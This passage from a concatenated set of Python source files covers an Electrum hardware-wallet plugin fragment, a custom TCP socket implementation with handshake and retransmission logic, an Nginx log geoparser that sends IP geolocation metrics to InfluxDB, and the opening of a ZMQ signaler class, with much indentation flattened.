multisig=multisig)
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
if full_path:
txinputtype._extend_address_n(full_path)
prev_hash = txin.prevout.txid
prev_index = txin.prevout.out_idx
if txin.value_sats() is not None:
txinputtype.amount = txin.value_sats()
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.script_sig is not None:
txinputtype.script_sig = txin.script_sig
txinputtype.sequence = txin.nsequence
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
return self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
def tx_outputs(self, tx: PartialTransaction, *, keystore: 'SafeTKeyStore'):
def create_output_by_derivation():
script_type = self.get_safet_output_script_type(txout.script_type)
if len(txout.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout)
multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout)
assert full_path
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=txout.value,
address_n=full_path,
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = txout.value
if address:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
else:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(txout)
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for txout in tx.outputs():
address = txout.address
use_create_by_derivation = False
if txout.is_mine and not has_change:
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if txout.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx: Optional[Transaction]):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
tx.deserialize()
t.version = tx.version
t.lock_time = tx.locktime
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for out in tx.outputs():
o = t._add_bin_outputs()
o.amount = out.value
o.script_pubkey = out.scriptpubkey
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
TCPsocket.py
|
AF_INET = 2
SOCK_STREAM = 1
RECEIVED_BUFFER_SIZE = 1048576  # TODO: discuss the buffer size, currently 1 MiB
import os
import random
import threading
import time
from pprint import pprint
import IP
from Exceptions import *
from TCP import *
buffer_list = {
    'listening': {},  # while a server is listening, the key of the inner dict is the server's port
    'connected': {
        'objects': {}
        # 'objects' stores every connected TCPsocket object as its value, keyed by its remote_address
    },  # while a socket (client or server) is connected, the key of the inner dict is the remote address
    'connecting': {},  # while a client is connecting, put self here; the remote address is the key, a list is the value
}
port_list = []
local_ip = None
class TCPsocket():
# status
CLOSED = 0
LISTEN = 1
SYN_RCVD = 2
ESTABLISHED = 3
CLOSE_WAIT = 4
LAST_ACK = 5
SYN_SENT = 6
FIN_WAIT_1 = 7
FIN_WAIT_2 = 8
TIME_WAIT = 9
# const
TIME_INTERVAL = 100
def __init__(self, local_address, remote_address=None, server_isn=None, client_isn=None, sample_RTT = None):
        self.__sent_but_not_acked = []  # raw bytes of sent-but-unacknowledged TCP segments, kept in sending order
        self.__sample_RTT_to_record = {}  # dict keyed by the expected ack number; value is the send time, or None when the segment is excluded from sample_RTT
self.__sample_RTT = sample_RTT # double
self.__estimated_RTT = sample_RTT # double
self.__dev_RTT = 0 # double
self.__window_buffer = [] # a list of tuples, a tuple is in the format of (sequence_number, data)
        self.__received_buffer = b''  # bytes, used to store complete in-order information
self.__ack_to_be_sent = []
self.__window_size = 5000
self.__segment_size = 500
self.__local_address = local_address
self.__is_time_out = False # init is_timeout
self.__send_buffer = b''
self.__time_out = 0 # todo init timeout
self.__timer = threading.Thread()
self.__timer_pid = 0 # helper variable for timer
self.__duplicate_ack = 0 # init duplicate ack number
local_ip = local_address[0]
        if server_isn:  # if the socket is built by the server (i.e. returned from accept())
# pass sequence number and last_acked_number
self.__next_sequence_number = server_isn
self.__last_ack_received = server_isn # SendBase
self.__last_acked_sent = client_isn
# init remote address and set up ip layer
self.__remote_address = remote_address
self.__ip = IP.IP(IP.PROTOCOL_TCP, self.__local_address[0], self.__remote_address[0])
# start sending process
self.__sending_process = threading.Thread(target=self._sending_thread)
self.__sending_process.start()
self.__time_out = self._get_new_timeout()
else:
self.__next_sequence_number = random.randint(0, 2147483645)
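            # a client socket only picks an ISN here; the IP layer and the sending thread are set up in connect()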
def listen(self, backlog=None):
"""
listen([backlog])
Enable a server to accept connections. If backlog is specified, it must be
at least 0 (if it is lower, it is set to 0); it specifies the number of
unaccepted connections that the system will allow before refusing new
connections. If not specified, a default reasonable value is chosen.
"""
if not self.__local_address:
raise AddressNotSpecified("Did you bind address for this socket?")
if self.__local_address[1] in buffer_list.keys():
raise PortAlreadyInUse("Port is already in use.")
# print('start listening')
# open buffer for listening
buffer_list['listening'][self.__local_address[1]] = {'queue': []}
# print('create buffer_list')
# print(buffer_list)
# set up ip layer
self.__ip = IP.IP(IP.PROTOCOL_TCP, self.__local_address[0])
def accept(self):
"""accept() -> address tuple, server_isn int
Wait for an incoming connection. Return a new socket
representing the connection, and the address of the client.
For IP sockets, the address info is a pair (hostaddr, port).
"""
# fd, addr = self._accept()
# If our type has the SOCK_NONBLOCK flag, we shouldn't pass it onto the
# new socket. We do not currently allow passing SOCK_NONBLOCK to
# accept4, so the returned socket is always blocking.
# type = self.type & ~globals().get("SOCK_NONBLOCK", 0)
# sock = socket(self.family, type, self.proto, fileno=fd)
# Issue #7995: if no default timeout is set and the listening
# socket had a (non-zero) timeout, force the new socket in blocking
# mode to override platform-specific socket flags inheritance.
# if getdefaulttimeout() is None and self.gettimeout():
# sock.setblocking(True)
# return address, server_isn
# if not self.__address:
# raise AddressNotSpecified("Did you bind address for this socket?")
# wait until one connected
while buffer_list['listening'][self.__local_address[1]]['queue'] == []:
continue
        # retrieve the first handshake
data, (remote_ip, remote_port) = buffer_list['listening'][self.__local_address[1]]['queue'].pop()
tcp = TCP()
tcp.from_bytes(data)
if not (tcp.SYN == 1 and tcp.ACK == 0):
# print("wrong tcp package received, it's not the first handshake")
return
client_isn = tcp.sequence_number
print('first handshake received')
# reformat remote_address
address = (remote_ip, tcp.src_port)
        # generate an initial server_isn
server_isn = random.randint(0, 2147483645)
# build a tcp with server_isn and client_isn + 1
tcp = TCP()
tcp.build(type=tcp.SEND_SYNACK,
src_port=self.__local_address[1],
dst_port=address[1],
sequence_number=server_isn,
acknowledgement_number=client_isn + 1)
# send the second handshake and register a place for handshake
tmp_ip = IP.IP(IP.PROTOCOL_TCP, self.__local_address[0], remote_ip)
tmp_ip.send(bytes(tcp))
buffer_list['connecting'][address] = []
print('second handshake sent, waiting for the third handshake')
        # record the time the second handshake was sent (used for the first sample RTT)
        first_package_sent_time = time.time()
# wait until third handshake appear
send_send_start_time = time.time()
flag_3 = True
flag_6 = False
flag_12 = False
while buffer_list['connecting'][address] == []:
            if flag_3 and (time.time() - send_send_start_time >= 2):
                print('timed out waiting for third handshake, retransmitting second handshake (1st retry)')
                tmp_ip.send(bytes(tcp))
                flag_3 = False
                flag_6 = True
                send_send_start_time = time.time()
            elif flag_6 and (time.time() - send_send_start_time >= 2):
                print('timed out waiting for third handshake, retransmitting second handshake (2nd retry)')
                tmp_ip.send(bytes(tcp))
                flag_6 = False
                flag_12 = True
                send_send_start_time = time.time()
            elif flag_12 and (time.time() - send_send_start_time >= 2):
                print('timed out waiting for third handshake, retransmitting second handshake (3rd retry)')
                tmp_ip.send(bytes(tcp))
                flag_6 = False
                flag_12 = False
                send_send_start_time = time.time()
            elif (time.time() - send_send_start_time >= 4):
                print('timed out waiting for third handshake, giving up')
                return
continue
        # the third handshake arrived; use the second/third handshake round trip as the first sample RTT
        self.__sample_RTT = time.time() - first_package_sent_time
self.__estimated_RTT = self.__sample_RTT
print('first sample RTT generated, it\'s {}'.format(self.__sample_RTT))
        # retrieve the third handshake
data, address = buffer_list['connecting'][address].pop()
tcp = TCP()
tcp.from_bytes(data)
        print('third handshake retrieved')
# check third handshake
if not (tcp.sequence_number == client_isn + 1 and tcp.acknowledgement_number == server_isn + 1):
print(
'SYN {}, ACK{}, tcp.sequencenumber({}) ?= client_isn({}), tcp.acknowledgement_number({}) ?= server_isn({})'.format(
tcp.SYN, tcp.ACK, tcp.sequence_number, client_isn + 1, tcp.acknowledgement_number, server_isn + 1))
print("wrong tcp package received, it's not the correct third handshake")
return
# update server_isn
server_isn += 1
# open a place for the newly connected socket
buffer_list['connected'][address] = []
# delete the original space
buffer_list['connecting'].pop(address)
# add data to the buffer if any
# buffer_list['connected'][address].append(tcp.data)
# Build a new tcpSocket
tcpSocket = TCPsocket(self.__local_address, address, server_isn, client_isn + 1, self.__sample_RTT)
        # put the connected object in the buffer
buffer_list['connected']['objects'][address] = tcpSocket
# add data if any
if tcp.data != b'':
tcpSocket._add_data(tcp.data)
print('done with accept, returned address and server_isn')
return address, tcpSocket
def recv(self, buffersize, flags=None): # real signature unknown; restored from __doc__
"""
recv(buffersize[, flags]) -> data
Receive up to buffersize bytes from the socket. For the optional flags
argument, see the Unix manual. When no data is available, block until
at least one byte is available or until the remote end is closed. When
the remote end is closed and all data is read, return the empty string.
"""
while not self.__received_buffer:
continue
return_data = self.__received_buffer[:buffersize]
self.__received_buffer = self.__received_buffer[buffersize:]
return return_data
def send(self, data, flags=None): # real signature unknown; restored from __doc__
"""
send(data[, flags]) -> count
Send a data string to the socket. For the optional flags
argument, see the Unix manual. Return the number of bytes
sent; this may be less than len(data) if the network is busy.
"""
# if self.__type != SOCK_STREAM:
# raise TypeNotRightException("type is not correct, is the socket assigned TCP protocol?")
# NextSeqNum: int = 0
self.__send_buffer += data
def _sending_thread(self):
# build empty tcp object
tcp = TCP()
tcp.build(type=tcp.SEND_DATA, src_port=self.__local_address[1], dst_port=self.__remote_address[1])
tcp.sequence_number = self.__next_sequence_number
tcp.acknowledgement_number = self.__last_acked_sent
print('built empty tcp object')
while 1:
time.sleep(0.2)
# print('sending thread begin')
# detect whether there is act_to_be_sent
if self.__ack_to_be_sent != []:
tcp.ACK = 1
tcp.acknowledgement_number = self.__ack_to_be_sent.pop()
self.__last_acked_sent = tcp.acknowledgement_number
print(
'detect there is ack_to_be_sent({}), added to current tcp object, last_acked_number updated'.format(
tcp.acknowledgement_number))
# check time_out
if self.__is_time_out:
print('detect time out')
# get first send_but_not_acked data in tcp.data
try:
tcp_bytes = self.__sent_but_not_acked[0]
tcp = TCP()
tcp.from_bytes(tcp_bytes)
# modify tcp.sequence_number
# tcp.sequence_number = waiting_ack_number - len(tcp.data)
# double timeout
self.__time_out *= 2
if self.__time_out <= 1:
self.__time_out = 1
# cancel SampleRTT recording for this object
self.__sample_RTT_to_record[tcp.sequence_number + len(tcp.data)] = None
# Done with here
self.__is_time_out = False
self.__timer = threading.Thread()
self.__timer_pid = None
print(self.__time_out)
except:
self.__is_time_out = False
self.__timer = threading.Thread()
self.__timer_pid = None
else:
# print('no timeout detected')
# calculate the spare room in sent_but_not_acked
spare_room_in_window = self.__window_size - (self.__next_sequence_number - self.__last_ack_received)
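                # only pull new data from send_buffer while the send window (window_size bytes past SendBase) still has room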
                if self.__send_buffer != b'' and spare_room_in_window != 0:  # specify sequence number and NextSeqNum
NextSeqNum = self.__next_sequence_number
# prepare data
data = self.__send_buffer[:self.__segment_size]
# delete that data from send_buffer
self.__send_buffer = self.__send_buffer[self.__segment_size:]
# update tcp object
tcp.data = data
tcp.sequence_number = NextSeqNum
# check tcp modified
if tcp.data != b'' or tcp.ACK == 1:
# set sequence number
# tcp.sequence_number = self.__next_sequence_number
# if data included, update next_sequence_number
if tcp.data != b'':
self.__next_sequence_number += len(data)
# if the tcp contains data
if tcp.data != b'':
# check the data is first sent or not
# add current value to sent_but_not_acked
if bytes(tcp) not in self.__sent_but_not_acked:
self.__sent_but_not_acked.append(bytes(tcp))
if (tcp.sequence_number + len(tcp.data)) not in self.__sample_RTT_to_record.keys():
# it's first sent.
# record send time
send_time = time.time()
self.__sample_RTT_to_record[tcp.sequence_number + len(tcp.data)] = send_time
# print('----------')
# print('record time')
# print(self.__sample_RTT_to_record)
# print('----------')
                        # check whether there is already a timer
print('check timer', self.__timer.is_alive())
if not self.__timer.is_alive():
# there is no timer
# calculate a new time_out
self.__time_out = self._get_new_timeout()
# start a new timer
self.__timer = threading.Thread(target=self.__check_time,
args=(time.time(),
self.__time_out))
self.__timer.start()
else:
# it's not first sent
# double timeout
print('detect not first send message, the sequence_number is {}, the ack_number is {}, content:{}'.format(tcp.sequence_number, tcp.acknowledgement_number, str(tcp)))
print(self.__sample_RTT_to_record)
self.__time_out *= 2
self.__timer = threading.Thread(target=self.__check_time,
args=(time.time(),
self.__time_out))
self.__timer.start()
# send tcp object
self.__ip.send(bytes(tcp))
print(
'send tcp object with \tsequence number {} and \tacknowledge number {}.'.format(tcp.sequence_number,
tcp.acknowledgement_number))
print('content', str(tcp))
# build new tcp object
tcp = TCP()
tcp.build(type=tcp.SEND_DATA, src_port=self.__local_address[1], dst_port=self.__remote_address[1])
tcp.sequence_number = self.__next_sequence_number
tcp.acknowledgement_number = self.__last_acked_sent
# print('built empty tcp object')
def _add_data(self, data):
tcp = TCP()
tcp.from_bytes(data)
# print('retrived data from IP layer')
# if has ack info
if tcp.ACK == 1:
# print("detect ACK info, it's", tcp.acknowledgement_number)
if tcp.acknowledgement_number == self.__last_ack_received:
# it's duplicated ack
self.__duplicate_ack += 1
print('detect {} duplicated ACK'.format(self.__duplicate_ack))
if self.__duplicate_ack >= 3:
# fast retransmission
# stop timer and make timeout to be true
self.__timer = threading.Thread()
self.__timer_pid = None
self.__is_time_out = True
                    print('timer stopped, set timeout to be true, preparing for retransmission')
self.__duplicate_ack = 0
else:
self.__duplicate_ack = 0
# it's not duplicated ack
if tcp.acknowledgement_number > self.__last_ack_received:
print('current SendBase {}, updated to {}'.format(self.__last_ack_received,
tcp.acknowledgement_number))
# update SendBase
self.__last_ack_received = tcp.acknowledgement_number
self.__next_sequence_number = tcp.acknowledgement_number
# calculating a new SampleRTT
# print('----------')
# print('receive time')
# print(self.__sample_RTT_to_record)
# print('tcp info:')
# print('sequence_number:{}, acknowledgement_number:{}, content:{}'.format(tcp.sequence_number, tcp.acknowledgement_number, str(tcp)))
# print('----------')
try:
self.__sample_RTT = time.time() - self.__sample_RTT_to_record[tcp.acknowledgement_number]
except:
pass
# remove self.__send_but_not_acked objects according to the ack number
print('updating sent_but_not_acked list')
remove_list = []
for tcp_bytes in self.__sent_but_not_acked:
tcp_ = TCP()
tcp_.from_bytes(tcp_bytes)
if tcp_.sequence_number + len(tcp_.data)<= tcp.acknowledgement_number:
remove_list.append(tcp_bytes)
print('removed waiting_ack_number:{}'.format(tcp_.sequence_number + len(tcp_.data)))
for item in remove_list:
self.__sent_but_not_acked.remove(item)
# print('updated')
# check whether a timer is running
if self.__timer.is_alive():
print('detect a timer still running')
# check whether there are still sent_but_not_acked
if self.__sent_but_not_acked:
print('detect there is still sent_but_not_acked:')
print(self.__sent_but_not_acked)
print('restart timer')
self.__time_out = self._get_new_timeout()
# restart timer
self.__timer = threading.Thread(target=self.__check_time,
args=(time.time(), self.__time_out))
self.__timer.start()
else:
# stop timer
self.__timer = threading.Thread()
self.__timer_pid = None
self.__is_time_out = False
self.__time_out = self._get_new_timeout()
                    print('no data in sent_but_not_acked, stopped timer')
# if has data info:
if tcp.data != b'':
# check whether it's duplicate data
if tcp.sequence_number < self.__last_acked_sent:
print('the sequence_number({}) < last_acked_sent({}), omit it.'.format(tcp.sequence_number,
self.__last_acked_sent))
# it's duplicate data
tcp = TCP()
tcp.build(type = tcp.SEND_ACK, src_port=self.__local_address[1], dst_port=self.__remote_address[1], acknowledgement_number=self.__last_acked_sent)
print('duplicate data, send ack')
else:
# it's not duplicate data
# put it in self.__window_buffer and sort
print(tcp.data, 'has added to window buffer')
self.__window_buffer.append((tcp.sequence_number, tcp.data))
self.__window_buffer.sort(key=lambda x: x[0])
# check tmp_buffer in-order data, if any, put it to recv_buffer
                while self.__window_buffer[0][0] == self.__last_acked_sent:
                    # retrieve the in-order segment from the front of window_buffer (tmp_buffer)
                    sequence_number, data = self.__window_buffer.pop(0)
# calculate and update last_ack_sent
self.__last_acked_sent += len(data)
# put data into recv_buffer
self.__received_buffer += data
print(
'put data with sequence_number {} out of tmp_buffer into recv_buffer, updated last_ack_sent, waiting to be sent later'.format(tcp.sequence_number))
if len(self.__window_buffer) == 0:
break
# put last_ack_sent to ack_to_be_sent
self.__ack_to_be_sent.append(self.__last_acked_sent)
print('not duplicate, send ack', self.__last_acked_sent)
def connect(self, remote_address): # real signature unknown; restored from __doc__
"""
connect(address)
Connect the socket to a remote address. For IP sockets, the address
is a pair (host, port).
"""
# init remote_address
self.__remote_address = remote_address
# connect to IP layer
print('connecting to IP layer')
self.__ip = IP.IP(IP.PROTOCOL_TCP, self.__local_address[0], dst_ip=remote_address[0])
print('connected to IP layer')
# generate client_isn
self.__isn = random.randint(0, 2147483645)
client_isn = self.__isn
print('generated isn', self.__isn)
# build a tcp object with SYN
tcp = TCP()
tcp.build(type=tcp.SEND_SYN,
src_port=self.__local_address[1],
dst_port=remote_address[1],
sequence_number=self.__isn)
# sign a space in buffer_list
buffer_list['connecting'][remote_address] = []
# sent tcp object
self.__ip.send(bytes(tcp))
print('sent tcp object')
# record first_package_sent_time
first_package_sent_time = time.time()
        # wait for the second handshake
        print('waiting for the second handshake')
        start_time = time.time()
        flag_3 = True
        flag_6 = False
        flag_12 = False
        while buffer_list['connecting'][remote_address] == []:
            if flag_3 and time.time() - start_time >= 2:
                print('timed out waiting for second handshake, retransmitting SYN (1st retry)')
                self.__ip.send(bytes(tcp))
                flag_3 = False
                flag_6 = True
                start_time = time.time()
            elif flag_6 and time.time() - start_time >= 2:
                print('timed out waiting for second handshake, retransmitting SYN (2nd retry)')
                self.__ip.send(bytes(tcp))
                flag_6 = False
                flag_12 = True
                start_time = time.time()
            elif flag_12 and time.time() - start_time >= 2:
                print('timed out waiting for second handshake, retransmitting SYN (3rd retry)')
                self.__ip.send(bytes(tcp))
                flag_12 = False
                start_time = time.time()
            elif time.time() - start_time >= 4:
                print('timed out waiting for second handshake, giving up')
                return
continue
self.status = 'established'
# record first_package_receive_time
self.__sample_RTT = time.time() - first_package_sent_time
self.__estimated_RTT = self.__sample_RTT
self._get_new_timeout()
        print('first sample RTT initialized, it\'s', self.__sample_RTT)
        # retrieve data
        data = buffer_list['connecting'][remote_address].pop()
        print('retrieved')
# parse tcp object
tcp = TCP()
tcp.from_bytes(data)
# check tcp object is right
if not (tcp.SYN == 1 and tcp.ACK == 1 and tcp.acknowledgement_number == client_isn + 1):
print('the tcp object is not right. Connect failed')
return
# if it's right, update server_isn, client_isn
server_isn = tcp.sequence_number
client_isn += 1
self.__next_sequence_number = client_isn
print('client_isn sent', client_isn)
self.__last_ack_received = tcp.acknowledgement_number
# remove from buffer_list['connecting'], added to buffer_list['connected']
buffer_list['connecting'].pop(remote_address)
buffer_list['connected']['objects'][remote_address] = self
# generate last_ack_sent and update ack_to_be_sent list, last_ack_received
self.__last_acked_sent = server_isn + 1
self.__ack_to_be_sent.append(self.__last_acked_sent)
# start sending thread
self.__sending_process = threading.Thread(target=self._sending_thread)
self.__sending_process.start()
print('connected')
@staticmethod
def push(data, remote_ip):
# print
# print('[static method]received data from ip, it\'s from', remote_ip)
tcp = TCP()
tcp.from_bytes(data)
# print('current buffer_list is')
# print(buffer_list)
# print('src_port is', tcp.src_port, end=' ')
# print('dst_port is', tcp.dst_port, end=' ')
# print('content is', str(tcp))
# print()
# print basic info
# names = ['CWR','ECE','URG','ACK','PSH','RST','SYN','FIN']
# byte = tcp.flag_bits
# byte = bin(int.from_bytes(byte, 'little'))[2:]
# print(bytes)
# for i in range(8):
# print("{}:{}".format(names[i], byte[i]))
#
# if tcp.SYN == 1 and tcp.ACK != 1:
# b
remote_address = (remote_ip, tcp.src_port)
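        # dispatch on the TCP flags: SYN+ACK goes to a connecting client, a bare SYN to a listening
        # server, anything else to an established socket (or it is the third handshake)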
if tcp.RST:
raise ConnectionResetError
try:
if tcp.SYN == 1 and tcp.ACK == 1:
print('detect second handshake')
try:
buffer_list['connecting'][remote_address].append(data)
except:
server_isn = tcp.sequence_number
client_isn = tcp.acknowledgement_number
remote_port = tcp.src_port
local_port = tcp.dst_port
tcp = TCP()
tcp.sequence_number = client_isn
tcp.acknowledgement_number = server_isn
tcp.src_port = local_port
tcp.dst_port = remote_port
tmp_ip = IP.IP(protocol=IP.PROTOCOL_TCP, src_ip=local_ip, dst_ip=remote_ip)
                    print('retransmitted', tcp.sequence_number, tcp.acknowledgement_number)
print("str", str(tcp))
tmp_ip.send(bytes(tcp))
elif tcp.SYN == 1:
# it's first handshake
print('detect first handshake')
buffer_list['listening'][tcp.dst_port]['queue'].append((data, remote_address))
else:
# it's not first handshake
# self.__last_acked_number = tcp.acknowledgement_number # todo update last_acked_number
# check whether it's a third handshake
if remote_address in buffer_list['connected']['objects'].keys():
print('detect normal message')
# it's not a third handshake
# buffer_list['connected'][remote_address].append((data, remote_address))
# get tcp object
obj = buffer_list['connected']['objects'][remote_address]
# let obj add data
obj._add_data(data)
else:
# it's a third handshake
print('detect third handshake')
buffer_list['connecting'][remote_address].append((data, remote_address))
except:
local_port = tcp.dst_port
remote_port = tcp.src_port
sequence_number = tcp.acknowledgement_number
acknowledge_number = tcp.sequence_number
tcp = TCP()
tcp.RST = 1
tcp.ACK = 0
tcp.src_port = local_port
tcp.dst_port = remote_port
tcp.sequence_number = sequence_number
tcp.acknowledgement_number = acknowledge_number
tmp_ip = IP.IP(protocol=IP.PROTOCOL_TCP, src_ip= local_ip, dst_ip=remote_ip)
tmp_ip.send(bytes(tcp))
# print()
def _get_new_timeout(self): # todo calculate a new time out
if not self.__estimated_RTT:
self.__estimated_RTT = self.__sample_RTT
if not self.__dev_RTT:
self.__dev_RTT = 0
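        # EWMA update in the spirit of RFC 6298 (alpha = 0.125, beta = 0.25);
        # note the timeout below adds a single DevRTT term instead of the usual 4 * DevRTT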
        self.__estimated_RTT = 0.875 * self.__estimated_RTT + 0.125 * self.__sample_RTT
self.__dev_RTT = 0.75 * self.__dev_RTT + 0.25 * abs(self.__sample_RTT - self.__estimated_RTT)
self.__time_out = self.__estimated_RTT + self.__dev_RTT
if self.__time_out == 0:
self.__time_out = 1
return self.__time_out
def __check_time(self, start_time, time_interval):
print('timer start')
self.__timer_pid = os.getpid()
pid = os.getpid()
while 1:
# print('ticking', time.time(), start_time, time_interval)
time.sleep(time_interval * 0.1)
if self.__timer_pid != pid:
return
current_time = time.time()
if current_time - start_time > time_interval:
self.__is_time_out = True
self.timer_thread = threading.Thread()
return
def close(self):
try:
buffer_list['listening'].pop(self.__local_address[1])
except:
pass
try:
buffer_list['connecting'].pop(self.__remote_address)
except:
pass
try:
            buffer_list['connected']['objects'].pop(self.__remote_address)
except:
pass
def __del__(self):
pass
|
geoparser.py
|
# Getting GEO information from Nginx access.log by IP's.
# Alexey Nizhegolenko 2018
# Parts added by Remko Lodder, 2019.
# Added: IPv6 matching, make query based on geoip2 instead of
# geoip, which is going away r.s.n.
import os
import re
import sys
import time
import geohash
import logging
import logging.handlers
import geoip2.database
import configparser
import threading
from influxdb import InfluxDBClient
from IPy import IP as ipadd
import glob
class SyslogBOMFormatter(logging.Formatter):
def format(self, record):
result = super().format(record)
return "ufeff" + result
handler = logging.handlers.SysLogHandler('/dev/log')
formatter = SyslogBOMFormatter(logging.BASIC_FORMAT)
handler.setFormatter(formatter)
root = logging.getLogger(__name__)
root.setLevel(os.environ.get("LOGLEVEL", "INFO"))
root.addHandler(handler)
# Preparing for reading config file
PWD = os.path.abspath(os.path.dirname(os.path.realpath(__file__)))
CONFIG = configparser.ConfigParser()
CONFIG.read('%s/settings.ini' % PWD)
# Getting params from config
LOGPATH = CONFIG.get('NGINX_LOG', 'logpath')
INFLUXHOST = CONFIG.get('INFLUXDB', 'host')
INFLUXPORT = CONFIG.get('INFLUXDB', 'port')
INFLUXDBDB = CONFIG.get('INFLUXDB', 'database')
INFLUXUSER = CONFIG.get('INFLUXDB', 'username')
MEASUREMENT = CONFIG.get('INFLUXDB', 'measurement')
INFLUXUSERPASS = CONFIG.get('INFLUXDB', 'password')
GEOIPDB = CONFIG.get('GEOIP', 'geoipdb')
GI = geoip2.database.Reader(GEOIPDB)
def logparse(LOGPATH, INFLUXHOST, INFLUXPORT, INFLUXDBDB, INFLUXUSER, INFLUXUSERPASS, MEASUREMENT, INODE): # NOQA
# Preparing variables and params
try:
IPS = {}
COUNT = {}
GEOHASH = {}
HOSTNAME = os.uname()[1]
CLIENT = InfluxDBClient(host=INFLUXHOST, port=INFLUXPORT,
username=INFLUXUSER, password=INFLUXUSERPASS, database=INFLUXDBDB) # NOQA
        re_IPV4 = re.compile(r'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})')
re_IPV6 = re.compile('(([0-9a-fA-F]{1,4}:){7,7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,}|::(ffff(:0{1,4}){0,1}:){0,1}((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]))') # NOQA
        # Main loop: parse the access.log file tail -f style and send metrics
with open(LOGPATH, "r") as FILE:
STR_RESULTS = os.stat(LOGPATH)
ST_SIZE = STR_RESULTS[6]
FILE.seek(ST_SIZE)
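            # seek to the end of the file so only newly appended lines are processed (tail -f behaviour)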
while True:
METRICS = []
WHERE = FILE.tell()
LINE = FILE.readline()
print(LOGPATH)
print(LINE)
INODENEW = os.stat(LOGPATH).st_ino
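                # a changed inode means the log file was rotated; stop tailing this handle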
if INODE != INODENEW:
break
if not LINE:
time.sleep(1)
FILE.seek(WHERE)
else:
if re_IPV4.match(LINE):
m = re_IPV4.findall(LINE)
IP = m[1]
elif re_IPV6.match(LINE):
m = re_IPV6.findall(LINE)
IP = m[1]
if ipadd(IP).iptype() == 'PUBLIC' and IP:
INFO = GI.city(IP)
if INFO is not None:
print(INFO)
HASH = geohash.encode(INFO.location.latitude, INFO.location.longitude) # NOQA
COUNT['count'] = 1
GEOHASH['geohash'] = HASH
GEOHASH['host'] = HOSTNAME
GEOHASH['country_code'] = INFO.country.iso_code
GEOHASH['country_name'] = INFO.country.name
GEOHASH['city_name'] = INFO.city.name
IPS['tags'] = GEOHASH
IPS['fields'] = COUNT
IPS['measurement'] = MEASUREMENT
METRICS.append(IPS)
# Sending json data to InfluxDB
try:
CLIENT.write_points(METRICS)
except Exception:
logging.exception("Cannot establish connection with InfluxDB server: ") # NOQA
    except Exception:
logparse(LOGPATH, INFLUXHOST, INFLUXPORT, INFLUXDBDB, INFLUXUSER, INFLUXUSERPASS, MEASUREMENT, INODE)
def main():
# Parsing log file and sending metrics to Influxdb
threads = list()
# while True:
files = glob.glob(LOGPATH)
for fileName in files:
print("Parsing...", fileName)
# Get inode from log file
INODE = os.stat(fileName).st_ino
# Run main loop and grep a log file
if os.path.exists(fileName):
t = threading.Thread(target=logparse, args=(fileName, INFLUXHOST, INFLUXPORT, INFLUXDBDB, INFLUXUSER, INFLUXUSERPASS, MEASUREMENT, INODE,))
# logparse(fileName, INFLUXHOST, INFLUXPORT, INFLUXDBDB, INFLUXUSER, INFLUXUSERPASS, MEASUREMENT, GEOIPDB, INODE) # NOQA
threads.append(t)
try:
t.start()
            except Exception:
logging.exception("Cannot establish connection with InfluxDB server: ") # NOQA
else:
            logging.info('Nginx log file %s not found', fileName)
            print('Nginx log file %s not found' % fileName)
print("Waiting for threads to finish")
for thread in threads:
thread.join()
print("Closing")
if __name__ == '__main__':
try:
main()
except Exception:
logging.exception("Exception in main(): ")
except KeyboardInterrupt:
logging.exception("Exception KeyboardInterrupt: ")
sys.exit(0)
|
signaler.py
|
#!/usr/bin/env python
# encoding: utf-8
import Queue
import threading
import time
import zmq
from api import SIGNALS
from certificates import get_frontend_certificates
from utils import get_log_handler
logger = get_log_handler(__name__)
class Signaler(object):
"""
Signaler client.
Receives signals from the backend and sends to the signaling server.
"""
PORT = "5667"
